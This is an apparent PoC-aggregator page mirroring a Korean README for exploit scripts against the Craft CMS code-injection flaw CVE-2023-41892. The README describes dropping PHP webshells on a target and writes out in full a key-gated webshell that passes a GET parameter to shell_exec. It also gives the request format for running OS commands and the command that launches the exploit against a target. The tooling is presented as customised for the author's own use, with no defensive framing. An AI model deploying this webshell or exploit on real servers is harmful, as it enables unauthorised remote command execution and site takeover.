POC详情: d54baa43745afee66268f03828d5ab2ada9177db

来源
关联漏洞
标题: Pixel&tonic Craft CMS 代码注入漏洞 (CVE-2023-41892)
描述:Pixel&tonic Craft CMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。 Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。
描述
Customized this for my own use
介绍
# CVE-2023-41892_poc
Customized this for my own use

## poc_noauth.py
- 기본 PHP 원라인 웹쉘
- `?cmd=<명령어>` 통한 OS 명령어 실행

## poc_auth.py
- 간단한 키 기반 인증이 추가된 웹쉘 (SHA-256 해시 비교 방식)
- 올바른 키를 입력해야 명령어 실행 가능
- 코드 수정 필요:
  - `drop_payload` 함수 내부의 `webshell` 변수에서 `YOUR_SECRET_KEY` 부분을 원하는 키의 **SHA-256 해시값**으로 수정
- 사용 방법:
  1. `webshell` 내 `YOUR_SECRET_KEY` → 평문 키의 SHA-256 해시값으로 교체
  2. 요청 시에는 평문 키를 전달
     ```
     {target}/shell.php?k=<평문키>&c=<명령어>
     ```
- 예시:
  1. 설정: 평문 키 = test1234
  2. cyberchef 등을 통해 SHA256 해시화: 937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
     - `echo -n test1234 | sha256sum`
     - `cyberchef` 등
  3. 코드 수정:
      ```python
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      ```

## 사용 방법
python poc_noauth.py {타겟}
文件快照

[4.0K] /data/pocs/d54baa43745afee66268f03828d5ab2ada9177db ├── [2.9K] poc_auth.py ├── [2.8K] poc_noauth.py └── [1.2K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。